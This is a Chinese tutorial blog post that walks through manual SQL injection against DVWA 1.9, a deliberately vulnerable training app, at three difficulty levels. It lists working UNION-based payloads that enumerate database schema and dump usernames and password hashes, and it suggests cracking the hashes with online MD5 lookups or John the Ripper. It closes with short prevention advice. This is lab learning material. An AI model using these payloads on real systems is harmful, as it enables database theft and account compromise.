DVWA V_1.9 SQLI(关于数据库的知识，以后补全)

DVWA--V1.9,SQL注入手动测试

Low SQL Injection

输入1 or1 = 1，并没有值得期待的东西出来，看来数字型是不可以了，继续测试

加个引号输入1‘之后，报错，可以看到1’变为''1''',说明sql语句为select first_name from users from id = '1',此时因为多了一个'而报错（在sql语句中，字符串被''所包），看来有戏

查看源码，，符合我们的猜想：

进行注入

输入：1' or '1' = '1

接下来就是执行SQl语句：

首先查询有多少列，这里提供了里两种方法，(当然，这里只是在测试平台上，实际情况中，情况往往要更为复杂，可能会有上百列，那时候我们可以利用Python脚本来帮助我们执行这一过程)

输入%' or 0 = 0 union select 1,2 #

first name为第一列的值，surname为查询结果第二列的值

order by 3

查询信息的列数，当后边所跟数字超过字段数时会报错

%' or 0 =0 union select null,version()#

1' and 1=2 union select version(),database() --

利用ersion(),user(),database()函数来获得数据库信息

%' or '0' = '0' union select null,table_name from information_schema.tables#

1'or1=1 union select null,table_name from information_schema.tables#

information_schema是一个存储了其他数据库列信息的数据库

有一个user数据库

%' or 1 = 0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users'#

显示所有users表中的列，包括user_id,first_name,last_name,user,password

0x0a是新建一行的ASCII十六进制代码。使用它来分离用户名称和密码。更多关于ASCII表可以查看http://www.bluesock.org/~willg/dev/ascii.html。

与数据库中的列信息比较，相同

%' and 1=0 union select null,concat(first_name,' ',last_name,' ',user),password from users#

'union select concat(first_name,' ',last_name,' ',user),password from users#

'union select user,password from users --

%' and 1=0 union select user,password from users#

得到用户名与密码

Medium leval:

相比于低级的DVWA，中级的在源代码中多了$id = mysql_real_escape_string($id);

有关他的用法，可以参考http://php.net/manual/en/function.mysql-real-escape-string.php，这里不做过多讲解，大概知道他是可以过滤掉一部分字符，\,'等；

而且增加了一个select选项，去掉了输入框

使用另外一种类型的注入方法：数字型注入

使用firebug直接修改select的值

payload: 1 or 1 = 1 union select user,password from users #

High leval:

查看源代码，发现id是直接取自所输入的值，没有做过多更改

Limit1表示只需要一行数据

采用low leval的方法进行注入，payload: ' union select user,password from users #

得到的密码是MD5加密的，解密的话可以网上找在线解密MD5各种网站，搜索框输入CMD5即可：

或者可以使用John the Ripper这款工具来破解，

后记

在某一版本的DVWA中的高级SQLI中，部分源代码如下

$id = $_GET['id'];

$id = stripslashes($id);

$id = mysql_real_escape_string($id);

if (is_numeric($id)) {

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

相比于Medium，增加了两个函数，stripslashes($id);删除了反斜杠，if (is_numeric($id))检查了变量是否为数字，告诉了我们应该如何防止SQL注入，防止SQL注入可以简单总结一下，检查用户输入，用户输入的应该是程序员所希望输入的，而不是其他的一些字符，同样也适用于XSS等Web漏洞。